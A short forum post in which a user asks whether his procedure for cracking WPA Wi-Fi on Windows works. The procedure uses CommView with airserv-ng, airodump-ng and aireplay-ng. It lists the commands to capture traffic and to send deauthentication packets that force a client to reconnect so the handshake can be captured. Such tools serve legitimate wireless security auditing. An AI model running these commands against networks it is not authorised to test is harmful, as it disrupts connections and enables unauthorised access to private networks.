Topic: Crack WPA Windows CommView
Hello all
Cracking WPA using this technique works? Here is what I do.
3 cmd windows open in the C:Aircrack> directory. (1) Airserv-ng (2) Airodump-ng (3) Aireplay-ng.
—
(1): airserv-ng -d "commview.dll|debug" -p (port number can be anything from 1 – 65565) -c 1
Is this your card?
Y {enter}
(2): airodump-ng -w (capture file name) –ch (channel of the AP) 127.0.0.1:(port from server)
{enter}
(3): aireplay-ng -0 10 -a (BSSID) -c (CLIENT MAC) 127.0.0.1:(port from server)
{enter} / (not recommended) aireplay-ng -0 10 -a 127.0.0.1:(port)
—
Looking good?
Write Back
Simon